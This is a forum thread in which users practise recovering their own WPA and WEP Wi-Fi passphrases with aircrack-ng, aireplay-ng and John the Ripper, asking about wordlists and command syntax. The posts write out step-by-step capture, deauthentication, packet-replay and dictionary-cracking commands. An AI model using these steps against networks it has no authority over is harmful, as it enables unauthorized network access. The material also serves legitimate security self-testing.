Results 1 to 3 of 3

Thread: Am I doing this right

  1. #1
    Join Date
    Jan 2010
    Helsinki, Finland

    Question Am I doing this right


    Im trying to use aircrack-ng to find out my WLAN passphrase. I know it, but I want to practice it.
    Im using Alfa networks AWUS036H 1000mv usb device. Im using BT4 beta in VMware.

    1. airmon-ng stop wlan0
    2. airmon-ng start wlan0 -> mon0 (monitor mode)
    It does work also without steps 1 and 2
    3. airodump-ng mon0 --channel 6 --bssid (AP bssid) -w /tmp/WPA
    In new terminal
    4. aireplay-ng -0 1 -a (AP bssid) -c (target mac) mon0
    5. airodump-ng captures 4way handshake.
    6. I can stop that capture after ? pacets. I waited a few minutes.
    7. Then I copyed that WPA-01.cap file to windows 7 there I use Aircrack-ng gui to crack passphrase
    8. A wordlist crack found my passphrase, efter I add it to that wordlist file.
    My WLAN WPA-PSK passphrase was at the time of that capture salasana121 (=password121)
    I tried to use john the ripper on BT4 but after 20h i stopd it.

    So am I doing everything needen during that procedure? where to find a huge wordlist this thats what I have tried (I used atleast that finnish one)

    could I use a Brute Force Attack to solve my passphrase.

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    And In WEP passphrases, I did like this (no clients) - is there a difference is there any clients?
    1.airmon-ng stop wlan0
    2.airmon-ng start wlan0 -> monitor mode enabled mon0
    It does not work without steps 1 and 2
    3.airodump-ng mon0 -w /tmp/WEP --channel 6 --bssid (AP bssid)

    3.aireplay-ng -1 0 -a bssid (AP bssid) mon0

    4.aireplay-ng -3 -b (AP bssid) mon0

    And wait until there are 30 000 packets (second number from left)

    5.aircrack-ng /tmp/WEP-01.cap

  2. #2
    Join Date
    Jan 2010


    Well unless your password is in the dictionary file, its not going to find it.

    Brute force would take millions of years to run through every possible combination on the keyboard.

    Simply put your password in the dictionary and run it with aircrack in BT4 & then you will have proven the vunerability of WPA.

    Also try airolab-ng to make cracking quicker.

  3. #3
    Just burned his ISO
    Join Date
    Mar 2010


    I have a somewhat similar question I'm checking my wpa security and a wanted to try piping the dictionary list through john the ripper. However, when ran:

    ./john --wordlist=/mnt/sda/Dictionary/dictionary.txt --rules --stdout | aircrack-ng -e ssid -w - /kismet.dump

    it appears that it just tries an empty dictionary.
    is there something wrong with the command i'm using?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts